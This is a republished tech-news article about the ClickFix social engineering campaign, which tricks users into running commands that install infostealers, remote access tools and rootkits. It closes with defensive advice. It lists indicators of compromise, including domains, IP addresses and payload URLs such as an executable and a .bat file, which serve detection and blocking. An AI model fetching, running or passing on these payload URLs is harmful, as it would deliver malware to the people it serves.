Source: www.techrepublic.com – Author: J.R. Johnivan
We may earn from vendors via affiliate links or sponsorships. This might affect product placement on our site, but not the content of our reviews. See our Terms of Use for details.
Clever hackers are using ClickFix, a new social engineering technique, to deliver malicious payloads to unsuspecting users and devices around the globe.
Hackers are exploiting a technique called ClickFix to compromise thousands of users and devices each day, using social engineering tactics that trick users into launching malware on their own systems.
ClickFix relies on unsuspecting users attempting to fix what appear to be minor technical issues. In reality, those actions are exactly what a cybercriminal wants.
A recent post by Microsoft Threat Intelligence reads, in part: “Over the past year, Microsoft Threat Intelligence and Microsoft Defender Experts have observed the ClickFix social engineering technique growing in popularity, with campaigns targeting thousands of enterprise and end-user devices globally every day. Since early 2024, we’ve helped multiple customers across various industries address such campaigns attempting to deliver payloads like the prolific Lumma Stealer malware. These payloads affect Windows and macOS devices and typically lead to information theft and data exfiltration.”
Executing malicious commands
ClickFix works by tricking users into executing malicious commands on their own devices; this can include fake technical problems or prompts to verify the user is human. Because these actions appear normal, even tech-savvy users may not recognize the threat.
Once executed, ClickFix immediately attempts to download malicious software (malware) onto the compromised device. Some malware delivered through ClickFix has included:
- Infostealers, including Lumma Stealer.
- Various remote access tools (RATs), including AsyncRAT, SectopRAT, and Xworm.
- Other malware loaders, including MintsLoader and Latrodectus.
- System rootkits, including a customized version of r77.
Since ClickFix is launched on a local device by a user, it can easily circumvent security controls that prevent remote commands and other malicious actions from ever being executed in the first place. This makes it especially concerning to corporations, enterprises, and even small businesses around the globe.
Recognizing indicators of compromise
There are several telltale signs that a device has been affected by ClickFix. These red flags include various website domains, URLs, and IP addresses.
- Domains: mein-lonos-cloude.de, derk-meru.online, tesra.ship, cqsf.live, access-ssa-gov.es, binancepizza.info, and panel-spectrum.net.
- URLs: access-ssa-gov.es/ClientSetup.exe, applemacios.com/vv/install/sh, applemacios.com/m/vv/update, guildmerger.co/verify/eminem, and files.catbox.moe/snenal.bat.
- IP addresses: 185.234.72.186, 45.94.31.176, 3.138.123.13, 16.171.23.221, 3.23.103.13, 83.242.96.159, and 5.8.9.77.
Microsoft Defender Antivirus can detect ClickFix as known malware. Other apps, including Microsoft Defender for Endpoint and Microsoft Security Copilot, also issued alerts linked to this technique.
Defending against social engineering
Microsoft advises organizations and individuals to take a proactive approach to cybersecurity. Installing updates, enabling built-in protections, and educating users about social engineering threats are critical defenses. In the case of ClickFix, it’s crucial that users are educated on the threat of social engineering before they become victims themselves.
See how security experts are assessing the growing risks posed by social engineering in 2025.
Original Post URL: https://www.techrepublic.com/article/news-clickfix-attack-chain/
Category & Tags: International,Microsoft,News,Security – International,Microsoft,News,Security
Views: 5
